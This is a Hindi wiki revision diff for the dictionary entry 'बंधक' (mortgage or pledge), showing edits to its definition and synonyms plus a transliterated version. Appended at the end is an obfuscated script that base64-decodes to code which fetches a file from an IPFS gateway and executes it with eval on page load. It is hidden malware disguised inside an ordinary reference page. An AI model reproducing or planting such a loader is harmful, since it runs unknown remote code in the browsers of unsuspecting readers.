Difference between revisions of "बंधक"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('{{शब्द संदर्भ लघु |हिन्दी=बाँधनेवाला, अदला-बदली या वि...' के साथ नया पन्ना बनाया)
 
Line 1: Line 1:
 
{{शब्द संदर्भ लघु
 
{{शब्द संदर्भ लघु
|हिन्दी=बाँधनेवाला, अदला-बदली या विनिमय करनेवाला,लेन-देन या व्यवहार का वह प्रकार जिसमें किसी से रुपया उधार लेने के समय कोई मूल्यवान् वस्तु इस दृष्टि से महाजन के पास जमानत के तौर पर रख दी जाती है कि यदि ऋण और ब्याज न चुकाया जा सके तो महाजन वह वस्तु बेचकर अपना प्राप्य धन ले सकता है।  
+
|हिन्दी=अदला-बदली या विनिमय करनेवाला,लेन-देन या व्यवहार का वह प्रकार जिसमें किसी से रुपया उधार लेने के समय कोई मूल्यवान् वस्तु इस [[दृष्टि]] से महाजन के पास जमानत के तौर पर रख दी जाती है कि यदि ऋण और ब्याज न चुकाया जा सके तो महाजन वह वस्तु बेचकर अपना प्राप्य धन ले सकता है।  
 
|व्याकरण=[[विशेषण]]
 
|व्याकरण=[[विशेषण]]
 
|उदाहरण=सरकारों के हाथ में लोकतंत्र किस तरह बंधक है ये अच्छे से समझा जा सकता है।
 
|उदाहरण=सरकारों के हाथ में लोकतंत्र किस तरह बंधक है ये अच्छे से समझा जा सकता है।
 
|विशेष=किसी के पास अपनी वस्तु को बन्धक/गिरवी रखने वाला बन्धककर्ता कहा जाता है।
 
|विशेष=किसी के पास अपनी वस्तु को बन्धक/गिरवी रखने वाला बन्धककर्ता कहा जाता है।
 
|विलोम=
 
|विलोम=
|पर्यायवाची=अनुबंधकारी, अनुबंधक, रज्जु, रशना, तंत्री, कुशा, रस्सी, रसना, वटी, दाँवरी, वज्र लेप, चूर्ण।
+
|पर्यायवाची=अनुबंधकारी, अनुबंधक, रज्जु, रशना, तंत्री, कुशा, रस्सी, रसना, वटी, दाँवरी, धरोहर, अमानत, आधि।
 
|संस्कृत=[बन्ध्+ण्वुल् या बन्ध+कन्]  
 
|संस्कृत=[बन्ध्+ण्वुल् या बन्ध+कन्]  
 
|अन्य ग्रंथ=
 
|अन्य ग्रंथ=

Revision as of 09:48, 24 January 2011

shabd sandarbh
hindi adala-badali ya vinimay karanevala,len-den ya vyavahar ka vah prakar jisamean kisi se rupaya udhar lene ke samay koee moolyavanh vastu is drishti se mahajan ke pas jamanat ke taur par rakh di jati hai ki yadi rrin aur byaj n chukaya ja sake to mahajan vah vastu bechakar apana prapy dhan le sakata hai.
-vyakaran    visheshan
-udaharan   sarakaroan ke hath mean lokatantr kis tarah bandhak hai ye achchhe se samajha ja sakata hai.
-vishesh    kisi ke pas apani vastu ko bandhak/giravi rakhane vala bandhakakarta kaha jata hai.
-vilom   
-paryayavachi    anubandhakari, anubandhak, rajju, rashana, tantri, kusha, rassi, rasana, vati, daanvari, dharohar, amanat, adhi.
sanskrit [bandhh+nvulh ya bandh+kanh]
any granth
sanbandhit shabd
sanbandhit lekh

any shabdoan ke arth ke lie dekhean shabd sandarbh kosh
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>